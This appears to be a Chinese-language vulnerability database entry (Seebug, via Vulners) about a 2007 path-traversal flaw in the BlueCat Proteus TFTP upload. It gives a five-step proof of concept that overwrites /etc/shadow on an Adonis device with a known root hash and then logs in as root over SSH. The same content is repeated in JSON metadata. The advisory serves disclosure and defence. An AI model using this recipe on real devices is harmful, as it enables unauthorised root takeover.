Search...

BlueCat Networks Proteus TFTP文件远程权限提升漏洞

2007-08-08T00:00:00

ID SSV:2073
Type seebug
Reporter Root
Modified 2007-08-08T00:00:00

Description

BUGTRAQ ID: 25214

Proteus是企业级的IP地址管理设备。

Proteus的TFTP服务器实现上存在漏洞，远程攻击者可能利用此漏洞获取服务器的root用户权限。

可以使用Proteus向所管理的Adonis设备上传文件，管理员可以命名TFTP文件，但没有对用户输入（如相对路径）执行数据验证。所上传的文件仅可拷贝到/tftpboot/目录，且文件拷贝是以root用户权限执行的，因此名为../etc/shadow的文件可以覆盖影子口令数据库/etc/shadow。

Bluecat Networks Proteus 2.0.2.0 Bluecat Networks Adonis 5.0.2.8 临时解决方法：

禁止管理员的TFTP访问。

厂商补丁：

Bluecat Networks

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

<a href="http://www.bluecatnetworks.com/" target="_blank">http://www.bluecatnetworks.com/</a>

                                        
                                            
                                                1) 在Proteus配置中创建新的TFTP组
2) 添加TFTP部署角色，指定Adonis设备到组中
3) 在新TFTP组的顶级文件夹，添加名为../etc/shadow的文件并加载包含有以下行的文件：

   root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

4) 向Adonis设备部署配置
5) 现在可以口令bluecat以root权限登录到Adonis设备：

   $ ssh root@192.168.1.11
   root@192.168.1.11's password:
   # cat /etc/shadow
   root:Im0Zgl8tnEq9Y:13637:0:99999:7:::

注释：这个示例假设启用了SSH，iptable允许TCP/22端口。

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-2073", "status": "poc,details", "bulletinFamily": "exploit", "modified": "2007-08-08T00:00:00", "title": "BlueCat Networks Proteus TFTP\u6587\u4ef6\u8fdc\u7a0b\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-2073", "cvelist": [], "description": "BUGTRAQ ID: 25214\r\n\r\nProteus\u662f\u4f01\u4e1a\u7ea7\u7684IP\u5730\u5740\u7ba1\u7406\u8bbe\u5907\u3002\r\n\r\nProteus\u7684TFTP\u670d\u52a1\u5668\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u83b7\u53d6\u670d\u52a1\u5668\u7684root\u7528\u6237\u6743\u9650\u3002\r\n\r\n\u53ef\u4ee5\u4f7f\u7528Proteus\u5411\u6240\u7ba1\u7406\u7684Adonis\u8bbe\u5907\u4e0a\u4f20\u6587\u4ef6\uff0c\u7ba1\u7406\u5458\u53ef\u4ee5\u547d\u540dTFTP\u6587\u4ef6\uff0c\u4f46\u6ca1\u6709\u5bf9\u7528\u6237\u8f93\u5165\uff08\u5982\u76f8\u5bf9\u8def\u5f84\uff09\u6267\u884c\u6570\u636e\u9a8c\u8bc1\u3002\u6240\u4e0a\u4f20\u7684\u6587\u4ef6\u4ec5\u53ef\u62f7\u8d1d\u5230/tftpboot/\u76ee\u5f55\uff0c\u4e14\u6587\u4ef6\u62f7\u8d1d\u662f\u4ee5root\u7528\u6237\u6743\u9650\u6267\u884c\u7684\uff0c\u56e0\u6b64\u540d\u4e3a../etc/shadow\u7684\u6587\u4ef6\u53ef\u4ee5\u8986\u76d6\u5f71\u5b50\u53e3\u4ee4\u6570\u636e\u5e93/etc/shadow\u3002\r\n\n\nBluecat Networks Proteus 2.0.2.0\r\nBluecat Networks Adonis 5.0.2.8\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u6b62\u7ba1\u7406\u5458\u7684TFTP\u8bbf\u95ee\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nBluecat Networks\r\n----------------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\n<a href=\"http://www.bluecatnetworks.com/\" target=\"_blank\">http://www.bluecatnetworks.com/</a>", "viewCount": 3, "published": "2007-08-08T00:00:00", "sourceData": "\n 1) \u5728Proteus\u914d\u7f6e\u4e2d\u521b\u5efa\u65b0\u7684TFTP\u7ec4\r\n2) \u6dfb\u52a0TFTP\u90e8\u7f72\u89d2\u8272\uff0c\u6307\u5b9aAdonis\u8bbe\u5907\u5230\u7ec4\u4e2d\r\n3) \u5728\u65b0TFTP\u7ec4\u7684\u9876\u7ea7\u6587\u4ef6\u5939\uff0c\u6dfb\u52a0\u540d\u4e3a../etc/shadow\u7684\u6587\u4ef6\u5e76\u52a0\u8f7d\u5305\u542b\u6709\u4ee5\u4e0b\u884c\u7684\u6587\u4ef6\uff1a\r\n\r\n root:Im0Zgl8tnEq9Y:13637:0:99999:7:::\r\n\r\n4) \u5411Adonis\u8bbe\u5907\u90e8\u7f72\u914d\u7f6e\r\n5) \u73b0\u5728\u53ef\u4ee5\u53e3\u4ee4bluecat\u4ee5root\u6743\u9650\u767b\u5f55\u5230Adonis\u8bbe\u5907\uff1a\r\n\r\n $ ssh root@192.168.1.11\r\n root@192.168.1.11's password:\r\n # cat /etc/shadow\r\n root:Im0Zgl8tnEq9Y:13637:0:99999:7:::\r\n\r\n\u6ce8\u91ca\uff1a\u8fd9\u4e2a\u793a\u4f8b\u5047\u8bbe\u542f\u7528\u4e86SSH\uff0ciptable\u5141\u8bb8TCP/22\u7aef\u53e3\u3002\n ", "id": "SSV:2073", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:59:36", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645278965}}